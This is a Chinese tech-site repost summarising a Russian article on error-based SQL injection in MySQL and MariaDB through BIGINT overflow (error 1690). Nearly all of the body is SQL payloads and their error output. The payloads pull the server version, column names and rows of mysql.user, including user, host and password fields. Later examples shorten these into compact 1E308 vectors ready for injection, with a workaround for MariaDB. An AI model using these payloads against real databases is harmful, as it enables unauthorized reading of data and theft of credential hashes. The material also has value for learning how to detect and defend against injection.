最新文章专题视频专题问答1问答10问答100问答1000问答2000关键字专题1关键字专题50关键字专题500关键字专题1500TAG最新视频文章推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37视频文章20视频文章30视频文章40视频文章50视频文章60 视频文章70视频文章80视频文章90视频文章100视频文章120视频文章140 视频2关键字专题关键字专题tag2tag3文章专题文章专题2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章专题3
问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501
科技
当前位置: 首页 - 科技 - 知识百科 - 正文

新型Mysql报错注入_MySQL

来源:懂视网 责编:小采 时间:2020-11-09 19:31:47
文档

新型Mysql报错注入_MySQL

新型Mysql报错注入_MySQL: 原文是俄文,不好做翻译,附上大概的内容:这种报错注入主要基于Mysql数据类型溢出 mysql > SELECT 18446744073709551610 * 2 ;ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(1844674407370
推荐度:
点击下载本文 文档为doc格式
导读新型Mysql报错注入_MySQL: 原文是俄文,不好做翻译,附上大概的内容:这种报错注入主要基于Mysql数据类型溢出 mysql > SELECT 18446744073709551610 * 2 ;ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(1844674407370

原文是俄文,不好做翻译,附上大概的内容:

这种报错注入主要基于Mysql数据类型溢出

  1. mysql > SELECT 18446744073709551610 * 2 ;
  2. ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'
  4. mysql > SELECT - 1 * 9223372036854775808 ;
  5. ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(- (1) * 9223372036854775808)'
  1. mysql> SELECT * 2 (if ((SELECT * from (SELECT (version ()) ) s), 18446744073709551610, 18446744073709551610));
  3. ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if (( Select ' 5.5 'from Dual), 18446744073709551610.18446744073709551610))'
  2. mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);
  4. ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'
  6. // Узнаем имена колонок в таблице
  1. mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610);
  3. ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))'

需要注意的是该方法并不适用于于老版的Mysql,除此之外你还需要了解错误信息的长度限制,因为这将决定你可以获取多长的信息:

  1. mysys / my_error.c
  3. /* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */
  4. #define ERRMSGSIZE (512)

如果对象是MariaDB(Mysql的一个分支),当你尝试上面的方法时,你可能会看到这样的报错信息:

  1. mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))
  2. ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'

作为解决方案,可以通过这种方式来解决这个问题:

  1. mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a;
  2. ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - -(9223372036854775808))'

现在让我们看看能不能让我们的Vector更短一些

//查询数据库版本

  1. SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))
  2. =
  3. select 1E308*if((select*from(select version())x),2,2)
  1. SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a
  2. =
  3. select if(x,2,2)*1E308 from(select version()x)y
  1. SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)
  2. =
  3. select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)
  1. SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)
  2. =
  3. select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)<(select*from mysql.user limit 0),2,2)
  1. select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)

[1] [2] 下一页

声明:本网页内容旨在传播知识,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

文档

新型Mysql报错注入_MySQL

新型Mysql报错注入_MySQL: 原文是俄文,不好做翻译,附上大概的内容:这种报错注入主要基于Mysql数据类型溢出 mysql > SELECT 18446744073709551610 * 2 ;ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(1844674407370
推荐度:
点击下载本文 文档为doc格式
标签: 错误 mysql 注入
  • 热门焦点

最新推荐

猜你喜欢

热门推荐

专题
产品服务 发展历程 企业资讯 企业文化 关于我们 加入我们 联系我们 网站导航 网站律师

Copyright © 2019-2025 51dongshi.com 版权所有

赣ICP备2023002352号-2

违法及侵权请联系:TEL:177 7030 7066 E-MAIL:11247931@qq.com 本站由北京市万商天勤律师事务所王兴未律师提供法律服务

Top